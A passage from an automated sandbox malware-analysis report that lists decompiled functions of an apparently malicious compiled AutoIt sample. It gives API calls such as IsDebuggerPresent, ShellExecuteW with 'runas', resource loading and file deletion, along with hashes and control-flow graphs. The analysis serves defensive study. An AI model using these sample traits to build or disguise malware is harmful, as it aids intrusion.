37b3d7-37b3ee call 385884 778->781 782 37b3fb-37b401 778->782 779->774 783 37b2ca-37b2f0 WriteFile 779->783 781->682 789 37b3f4-37b3f5 781->789 782->766 783->682 786 37b2f6-37b30e 783->786 784->779 786->774 787 37b314-37b31b 786->787 787->782 790 37b321-37b34c WriteFile 787->790 789->782 790->682 791 37b352-37b359 790->791 791->774 792 37b35f-37b366 791->792 792->782
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4af47addcbf98cf2223402fc8d83709088f73408ec02e1827d430e98e789301b
                                                                  • Instruction ID: c1c9dc6b1662df85b5d8c6052406b7638276f2c371c577d38b5d8c1aa4f4bb6c
                                                                  • Opcode Fuzzy Hash: 4af47addcbf98cf2223402fc8d83709088f73408ec02e1827d430e98e789301b
                                                                  • Instruction Fuzzy Hash: 20324B75A022698BDB368F14DC817E9B7B9FF46310F5980D9E40EA7A81D7349E80CF52
                                                                  Function 00353D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151windowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00353AA3,?), ref: 00353D45
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,00353AA3,?), ref: 00353D57
                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,00411148,00411130,?,?,?,?,00353AA3,?), ref: 00353DC8
                                                                    • Part of subcall function 00356430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00353DEE,00411148,?,?,?,?,?,00353AA3,?), ref: 00356471
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,00353AA3,?), ref: 00353E48
                                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004028F4,00000010), ref: 003C1CCE
                                                                  • SetCurrentDirectoryW.KERNEL32(?,00411148,?,?,?,?,?,00353AA3,?), ref: 003C1D06
                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003EDAB4,00411148,?,?,?,?,?,00353AA3,?), ref: 003C1D89
                                                                  • ShellExecuteW.SHELL32(00000000,?,?,?,?,00353AA3), ref: 003C1D90
                                                                    • Part of subcall function 00353E6E: GetSysColorBrush.USER32(0000000F), ref: 00353E79
                                                                    • Part of subcall function 00353E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00353E88
                                                                    • Part of subcall function 00353E6E: LoadIconW.USER32(00000063), ref: 00353E9E
                                                                    • Part of subcall function 00353E6E: LoadIconW.USER32(000000A4), ref: 00353EB0
                                                                    • Part of subcall function 00353E6E: LoadIconW.USER32(000000A2), ref: 00353EC2
                                                                    • Part of subcall function 00353E6E: RegisterClassExW.USER32(?), ref: 00353F30
                                                                    • Part of subcall function 003536B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003536E6
                                                                    • Part of subcall function 003536B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00353707
                                                                    • Part of subcall function 003536B8: ShowWindow.USER32(00000000,?,?,?,?,00353AA3,?), ref: 0035371B
                                                                    • Part of subcall function 003536B8: ShowWindow.USER32(00000000,?,?,?,?,00353AA3,?), ref: 00353724
                                                                    • Part of subcall function 00354FFC: _memset.LIBCMT ref: 00355022
                                                                    • Part of subcall function 00354FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003550CB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                  • String ID: ()@$This is a third-party compiled AutoIt script.$runas
                                                                  • API String ID: 438480954-3604860743
                                                                  • Opcode ID: 408171e05e26f617db1e906021c5a97fc2fecdd64c0db8d9d0f43132186ef5db
                                                                  • Instruction ID: 7d1e8e8f5338ee9a65dcb1cdd00912372889e6a683d9bb609bdcabe00d769ebf
                                                                  • Opcode Fuzzy Hash: 408171e05e26f617db1e906021c5a97fc2fecdd64c0db8d9d0f43132186ef5db
                                                                  • Instruction Fuzzy Hash: DF512A31A04244BECF13ABB0DC46EEDBB799B09745F008079FA41AB1B2DB745A4DC725
                                                                  Function 0036DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1076 36ddc0-36de4f call 35d7f7 GetVersionExW call 356a63 call 36dfb4 call 356571 1085 36de55-36de56 1076->1085 1086 3c24c8-3c24cb 1076->1086 1087 36de92-36dea2 call 36df77 1085->1087 1088 36de58-36de63 1085->1088 1089 3c24cd 1086->1089 1090 3c24e4-3c24e8 1086->1090 1107 36dec7-36dee1 1087->1107 1108 36dea4-36dec1 GetCurrentProcess call 36df5f 1087->1108 1093 3c244e-3c2454 1088->1093 1094 36de69-36de6b 1088->1094 1096 3c24d0 1089->1096 1091 3c24ea-3c24f3 1090->1091 1092 3c24d3-3c24dc 1090->1092 1091->1096 1099 3c24f5-3c24f8 1091->1099 1092->1090 1097 3c245e-3c2464 1093->1097 1098 3c2456-3c2459 1093->1098 1100 3c2469-3c2475 1094->1100 1101 36de71-36de74 1094->1101 1096->1092 1097->1087 1098->1087 1099->1092 1103 3c247f-3c2485 1100->1103 1104 3c2477-3c247a 1100->1104 1105 3c2495-3c2498 1101->1105 1106 36de7a-36de89 1101->1106 1103->1087 1104->1087 1105->1087 1111 3c249e-3c24b3 1105->1111 1112 3c248a-3c2490 1106->1112 1113 36de8f 1106->1113 1109 36dee3-36def7 call 36e00c 1107->1109 1110 36df31-36df3b GetSystemInfo 1107->1110 1108->1107 1126 36dec3 1108->1126 1124 36df29-36df2f GetSystemInfo 1109->1124 1125 36def9-36df01 call 36dff4 GetNativeSystemInfo 1109->1125 1115 36df0e-36df1a 1110->1115 1117 3c24bd-3c24c3 1111->1117 1118 3c24b5-3c24b8 1111->1118 1112->1087 1113->1087 1121 36df21-36df26 1115->1121 1122 36df1c-36df1f FreeLibrary 1115->1122 1117->1087 1118->1087 1122->1121 1128 36df03-36df07 1124->1128 1125->1128 1126->1107 1128->1115 1130 36df09-36df0c FreeLibrary 1128->1130 1130->1115
                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?), ref: 0036DDEC
                                                                  • GetCurrentProcess.KERNEL32(00000000,003EDC38,?,?), ref: 0036DEAC
                                                                  • GetNativeSystemInfo.KERNELBASE(?,003EDC38,?,?), ref: 0036DF01
                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0036DF0C
                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0036DF1F
                                                                  • GetSystemInfo.KERNEL32(?,003EDC38,?,?), ref: 0036DF29
                                                                  • GetSystemInfo.KERNEL32(?,003EDC38,?,?), ref: 0036DF35
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                  • String ID:
                                                                  • API String ID: 3851250370-0
                                                                  • Opcode ID: e8e234b26e1465b5f3079c013b3575879009e7b08eb88caa003b58cfc144479d
                                                                  • Instruction ID: cd9f045562e10034cfc2f65e2be3f9fb789ba27a77178c21232098f20b0f44bc
                                                                  • Opcode Fuzzy Hash: e8e234b26e1465b5f3079c013b3575879009e7b08eb88caa003b58cfc144479d
                                                                  • Instruction Fuzzy Hash: 98618271D0A284DBCF16CF6894C15EA7FB4AF29300F1A85D9D8459F24BC625C909CB65
                                                                  Function 0035406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1148 35406b-354083 CreateStreamOnHGlobal 1149 354085-35409c FindResourceExW 1148->1149 1150 3540a3-3540a6 1148->1150 1151 3540a2 1149->1151 1152 3c4f16-3c4f25 LoadResource 1149->1152 1151->1150 1152->1151 1153 3c4f2b-3c4f39 SizeofResource 1152->1153 1153->1151 1154 3c4f3f-3c4f4a LockResource 1153->1154 1154->1151 1155 3c4f50-3c4f6e 1154->1155 1155->1151
                                                                  APIs
                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0035449E,?,?,00000000,00000001), ref: 0035407B
                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0035449E,?,?,00000000,00000001), ref: 00354092
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,0035449E,?,?,00000000,00000001,?,?,?,?,?,?,003541FB), ref: 003C4F1A
                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,0035449E,?,?,00000000,00000001,?,?,?,?,?,?,003541FB), ref: 003C4F2F
                                                                  • LockResource.KERNEL32(0035449E,?,?,0035449E,?,?,00000000,00000001,?,?,?,?,?,?,003541FB,00000000), ref: 003C4F42
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                  • String ID: SCRIPT
                                                                  • API String ID: 3051347437-3967369404
                                                                  • Opcode ID: c46ca539a7d76d07ed4d48b61c7793a7b9a5e5a14c884bd4aa42c8e73ddd11c8
                                                                  • Instruction ID: 8f8dbc51ba51bb661091dd64fcb3213844a700b1a703635a260cb07333992406
                                                                  • Opcode Fuzzy Hash: c46ca539a7d76d07ed4d48b61c7793a7b9a5e5a14c884bd4aa42c8e73ddd11c8
                                                                  • Instruction Fuzzy Hash: 69115E70200705AFE7268B66EC48F27BBBDEBC5B55F20452DFA02872A0DA71DC448A20
                                                                  Function 00396CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,003C2F49), ref: 00396CB9
                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 00396CCA
                                                                  • FindClose.KERNEL32(00000000), ref: 00396CDA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                  • String ID:
                                                                  • API String ID: 48322524-0
                                                                  • Opcode ID: 78be62ef516e577292eb257b198b552530e12ca4a35cae3ffe32294110cea6e9
                                                                  • Instruction ID: 064159bc7d4bbed24a36c8122e8931f0be7e04708580c4f1abc50ef0618eba4e
                                                                  • Opcode Fuzzy Hash: 78be62ef516e577292eb257b198b552530e12ca4a35cae3ffe32294110cea6e9
                                                                  • Instruction Fuzzy Hash: C1E04F32816515AB86226738FC0E8EA77ACEA06339F104716F976C21E0EB70DD448AD6
                                                                  Function 0035E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0035E959
                                                                  • timeGetTime.WINMM ref: 0035EBFA
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0035ED2E
                                                                  • TranslateMessage.USER32(?), ref: 0035ED3F
                                                                  • DispatchMessageW.USER32(?), ref: 0035ED4A
                                                                  • LockWindowUpdate.USER32(00000000), ref: 0035ED79
                                                                  • DestroyWindow.USER32 ref: 0035ED85
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0035ED9F
                                                                  • Sleep.KERNEL32(0000000A), ref: 003C5270
                                                                  • TranslateMessage.USER32(?), ref: 003C59F7
                                                                  • DispatchMessageW.USER32(?), ref: 003C5A05
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003C5A19
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                  • API String ID: 2641332412-570651680
                                                                  • Opcode ID: ba7f6823281e2c38de42a4e43ee24a242e741e25fab335e47826d100537a925c
                                                                  • Instruction ID: 497fc0ab039bf22ed45c16f9ea70cb04390b092182fdcf12e7592cbd93de4a1f
                                                                  • Opcode Fuzzy Hash: ba7f6823281e2c38de42a4e43ee24a242e741e25fab335e47826d100537a925c
                                                                  • Instruction Fuzzy Hash: CC62A070508340DFDB2ADF24C885FAA77E8BF44305F05496DED468B2A2DB75E988CB52
                                                                  Function 00385C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___createFile.LIBCMT ref: 00385EC3
                                                                  • ___createFile.LIBCMT ref: 00385F04
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00385F2D
                                                                  • __dosmaperr.LIBCMT ref: 00385F34
                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00385F47
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00385F6A
                                                                  • __dosmaperr.LIBCMT ref: 00385F73
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00385F7C
                                                                  • __set_osfhnd.LIBCMT ref: 00385FAC
                                                                  • __lseeki64_nolock.LIBCMT ref: 00386016
                                                                  • __close_nolock.LIBCMT ref: 0038603C
                                                                  • __chsize_nolock.LIBCMT ref: 0038606C
                                                                  • __lseeki64_nolock.LIBCMT ref: 0038607E
                                                                  • __lseeki64_nolock.LIBCMT ref: 00386176
                                                                  • __lseeki64_nolock.LIBCMT ref: 0038618B
                                                                  • __close_nolock.LIBCMT ref: 003861EB
                                                                    • Part of subcall function 0037EA9C: CloseHandle.KERNELBASE(00000000,003FEEF4,00000000,?,00386041,003FEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0037EAEC
                                                                    • Part of subcall function 0037EA9C: GetLastError.KERNEL32(?,00386041,003FEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0037EAF6
                                                                    • Part of subcall function 0037EA9C: __free_osfhnd.LIBCMT ref: 0037EB03
                                                                    • Part of subcall function 0037EA9C: __dosmaperr.LIBCMT ref: 0037EB25
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  • __lseeki64_nolock.LIBCMT ref: 0038620D
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00386342
                                                                  • ___createFile.LIBCMT ref: 00386361
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0038636E
                                                                  • __dosmaperr.LIBCMT ref: 00386375
                                                                  • __free_osfhnd.LIBCMT ref: 00386395
                                                                  • __invoke_watson.LIBCMT ref: 003863C3
                                                                  • __wsopen_helper.LIBCMT ref: 003863DD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                  • String ID: @
                                                                  • API String ID: 3896587723-2766056989
                                                                  • Opcode ID: 20f66fe1d5d6fa5b6fface9343e4b10fa804fcfcd20741f4a9000df220216af4
                                                                  • Instruction ID: b9d44579d7b8e2404b8e9acde84f35311187678053bd26ec93757f9d8f2d9822
                                                                  • Opcode Fuzzy Hash: 20f66fe1d5d6fa5b6fface9343e4b10fa804fcfcd20741f4a9000df220216af4
                                                                  • Instruction Fuzzy Hash: 5922587190470A9FEF27AF68DC56BFD7B61EB14310F2582A8E9219B2E2C3398D40C751
                                                                  Function 0039FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • _wcscpy.LIBCMT ref: 0039FA96
                                                                  • _wcschr.LIBCMT ref: 0039FAA4
                                                                  • _wcscpy.LIBCMT ref: 0039FABB
                                                                  • _wcscat.LIBCMT ref: 0039FACA
                                                                  • _wcscat.LIBCMT ref: 0039FAE8
                                                                  • _wcscpy.LIBCMT ref: 0039FB09
                                                                  • __wsplitpath.LIBCMT ref: 0039FBE6
                                                                  • _wcscpy.LIBCMT ref: 0039FC0B
                                                                  • _wcscpy.LIBCMT ref: 0039FC1D
                                                                  • _wcscpy.LIBCMT ref: 0039FC32
                                                                  • _wcscat.LIBCMT ref: 0039FC47
                                                                  • _wcscat.LIBCMT ref: 0039FC59
                                                                  • _wcscat.LIBCMT ref: 0039FC6E
                                                                    • Part of subcall function 0039BFA4: _wcscmp.LIBCMT ref: 0039C03E
                                                                    • Part of subcall function 0039BFA4: __wsplitpath.LIBCMT ref: 0039C083
                                                                    • Part of subcall function 0039BFA4: _wcscpy.LIBCMT ref: 0039C096
                                                                    • Part of subcall function 0039BFA4: _wcscat.LIBCMT ref: 0039C0A9
                                                                    • Part of subcall function 0039BFA4: __wsplitpath.LIBCMT ref: 0039C0CE
                                                                    • Part of subcall function 0039BFA4: _wcscat.LIBCMT ref: 0039C0E4
                                                                    • Part of subcall function 0039BFA4: _wcscat.LIBCMT ref: 0039C0F7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                  • String ID: >>>AUTOIT SCRIPT<<<$t2@
                                                                  • API String ID: 2955681530-4206106489
                                                                  • Opcode ID: 52a9dc67a303e1ed9aad48db3c34dbe829c10c5034323cd2d413fa4cee84c587
                                                                  • Instruction ID: 61172041b564f5a9ab60069a9e28436686e06774d7e2ec680f220ac60d92d809
                                                                  • Opcode Fuzzy Hash: 52a9dc67a303e1ed9aad48db3c34dbe829c10c5034323cd2d413fa4cee84c587
                                                                  • Instruction Fuzzy Hash: 48919072504705EFDF26EF54C851F9AB3E8BF44310F048869F9599B2A1DB34EA48CB92
                                                                  Function 00353F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00353F86
                                                                  • RegisterClassExW.USER32(00000030), ref: 00353FB0
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00353FC1
                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00353FDE
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00353FEE
                                                                  • LoadIconW.USER32(000000A9), ref: 00354004
                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00354013
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                  • API String ID: 2914291525-1005189915
                                                                  • Opcode ID: 6493c7e0d1a3f2e31ba5d39d27ae4669ee126da993d229c00dfa1f5a4d876d89
                                                                  • Instruction ID: 03dfaa4c8e4f710225eb5ff286a64c82dae456956cd23a985ec4e32b01fb33dc
                                                                  • Opcode Fuzzy Hash: 6493c7e0d1a3f2e31ba5d39d27ae4669ee126da993d229c00dfa1f5a4d876d89
                                                                  • Instruction Fuzzy Hash: 9421A4B5D41319AFDB01DFA5EC89BCDBBB8FB08700F00822AF615A62A0D7B545448F99
                                                                  Function 0039BFA4 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 0039BDB4: __time64.LIBCMT ref: 0039BDBE
                                                                    • Part of subcall function 00354517: _fseek.LIBCMT ref: 0035452F
                                                                  • __wsplitpath.LIBCMT ref: 0039C083
                                                                    • Part of subcall function 00371DFC: __wsplitpath_helper.LIBCMT ref: 00371E3C
                                                                  • _wcscpy.LIBCMT ref: 0039C096
                                                                  • _wcscat.LIBCMT ref: 0039C0A9
                                                                  • __wsplitpath.LIBCMT ref: 0039C0CE
                                                                  • _wcscat.LIBCMT ref: 0039C0E4
                                                                  • _wcscat.LIBCMT ref: 0039C0F7
                                                                  • _wcscmp.LIBCMT ref: 0039C03E
                                                                    • Part of subcall function 0039C56D: _wcscmp.LIBCMT ref: 0039C65D
                                                                    • Part of subcall function 0039C56D: _wcscmp.LIBCMT ref: 0039C670
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0039C2A1
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0039C338
                                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0039C34E
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0039C35F
                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0039C371
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
